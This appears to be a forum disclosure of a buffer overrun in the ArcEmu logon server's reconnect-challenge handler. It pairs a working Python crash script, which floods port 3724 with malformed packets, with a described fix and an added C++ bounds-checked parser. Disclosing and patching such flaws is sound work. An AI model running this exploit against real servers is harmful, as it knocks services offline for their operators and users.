I was feeling bored so I've decided to try crashing ArcEmu. After 10 minutes I found a trivial buffer overrun vulnerability in the logon server.
So I wrote this simple Python script that can crash the logon server. So yeah, there we go. Tested on 'ArcEmu 4.0-TRUNK 40e202f/Release-Linux (X86)'; sometimes this just causes a segfault, and sometimes it causes a double free, in which case glibc causes a trap (either way, it's a crash).
To clarify, this can crash any remote ArcEmu logon server that doesn't have this fixed.
Code:
# whoop whoop
# bug in AuthSocket::HandleReconnectChallenge
# (bytes literals are used so the script runs under both Python 2 and 3)
import socket
import struct

def pk(x, *xx):
    return struct.pack(x, *xx)

def to_fourcc(i):
    # four-character code, e.g. b'WoW '
    return pk('4s', i)

print("connecting ...")

def emit_bad_challenge(ln):
    # construct auth challenge
    ac = b''
    # 2 = AuthSocket::HandleReconnectChallenge
    ## header ##
    ac += pk('BBH', 2, 0, 80)          # cmd, error, size
    ## body ##
    ac += to_fourcc(b'WoW ')           # magic
    ac += pk('BBB', 0x00, 0x80, 0x00)  # version1,2,3
    ac += pk('H', 12340)               # build
    ac += to_fourcc(b'x86 ')           # platform
    ac += to_fourcc(b'Win ')           # os
    ac += to_fourcc(b'enUS')           # country
    ac += pk('i', -419)                # timezone bias
    ac += pk('i', 0)                   # ip
    ac += pk('B', ln)                  # len (I_len; the server indexes I[I_len] with no bounds check)
    ac += pk('50s', b' ')              # account name, padded to 50 bytes
    return ac

def send_junk(sock, k):
    ac = emit_bad_challenge(k)
    x = sock.send(ac)
    print("\tsend_junk: %d (length = %d, sent = %d)" % (k, len(ac), x))

# one fresh connection per I_len value from 50 up to 254
for i in range(50, 255):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.211.55.3", 3724))
    print("> %s" % s)
    send_junk(s, i)
To fix, add a length check in AuthSocket.cpp before the line 'm_challenge.I[m_challenge.I_len] = 0;', rejecting any packet whose I_len does not leave room for the terminator inside the I buffer.
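The fix described above, as an added C++ example (not ArcEmu's own code): a parser for the reconnect challenge that applies the missing length check before writing the terminator. The struct layout mirrors the fields the script sends, and the 50-byte size of I is an assumption; ArcEmu's real AuthSocket.cpp may declare it differently. ParseReconnectChallenge also rejects truncated packets, since a header that promises more name bytes than arrived is the other half of the same problem. AcceptsChallenge builds a constructed packet and reports whether the hardened parser accepts it.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <vector>

// Wire layout of the reconnect challenge as the script above emits it.
// Assumption: ArcEmu's real struct may differ; 50 for the I buffer is a guess.
#pragma pack(push, 1)
struct ReconnectChallenge {
    uint8_t  cmd;                      // 2 = reconnect challenge
    uint8_t  error;
    uint16_t size;                     // body size as sent by the client
    char     gamename[4];              // "WoW "
    uint8_t  version1, version2, version3;
    uint16_t build;
    char     platform[4];
    char     os[4];
    char     country[4];
    int32_t  timezone_bias;
    uint32_t ip;
    uint8_t  I_len;                    // declared length of the account name
    uint8_t  I[50];                    // account name, NUL-terminated by the server
};
#pragma pack(pop)

// Everything up to, but not including, the account-name bytes.
static const size_t kFixedPart = offsetof(ReconnectChallenge, I);

// Parse a raw packet into `out`. Returns false, leaving `out` untouched, when
// the header is incomplete, the declared name would not fit in I together with
// its terminator, or the body is shorter than I_len claims.
// The vulnerable handler wrote `m_challenge.I[m_challenge.I_len] = 0;` without
// the first of these checks, so any I_len >= sizeof(I) indexed past the buffer.
bool ParseReconnectChallenge(const uint8_t* buf, size_t len, ReconnectChallenge& out)
{
    if (len < kFixedPart)
        return false;                              // truncated header
    ReconnectChallenge tmp;
    std::memset(&tmp, 0, sizeof(tmp));
    std::memcpy(&tmp, buf, kFixedPart);
    if (tmp.I_len >= sizeof(tmp.I))
        return false;                              // the missing length check
    if (len < kFixedPart + tmp.I_len)
        return false;                              // body shorter than declared
    std::memcpy(tmp.I, buf + kFixedPart, tmp.I_len);
    tmp.I[tmp.I_len] = 0;                          // now provably in bounds
    out = tmp;
    return true;
}

// Build a constructed packet with I_len = i_len followed by payload_bytes of
// filler, and report whether the hardened parser accepts it.
bool AcceptsChallenge(uint8_t i_len, size_t payload_bytes)
{
    std::vector<uint8_t> pkt(kFixedPart + payload_bytes, 'A');
    ReconnectChallenge hdr;
    std::memset(&hdr, 0, sizeof(hdr));
    hdr.cmd   = 2;
    hdr.size  = static_cast<uint16_t>(pkt.size() - 4);  // bytes after the 4-byte header
    hdr.I_len = i_len;
    std::memcpy(pkt.data(), &hdr, kFixedPart);
    ReconnectChallenge parsed;
    return ParseReconnectChallenge(pkt.data(), pkt.size(), parsed);
}

int main()
{
    // Walk the same I_len range as the script (50..254), each with a 50-byte body:
    // every one of these is now rejected instead of reaching the out-of-bounds write.
    for (int ln = 50; ln < 255; ++ln)
        std::printf("I_len=%3d -> %s\n", ln,
                    AcceptsChallenge(static_cast<uint8_t>(ln), 50) ? "accepted" : "rejected");
    std::printf("I_len=  5 -> %s\n", AcceptsChallenge(5, 5) ? "accepted" : "rejected");
    return 0;
}
```

The check is `I_len >= sizeof(I)` rather than `>` because the terminator itself needs one byte; an I_len of exactly 50 would still write one past the end of a 50-byte buffer.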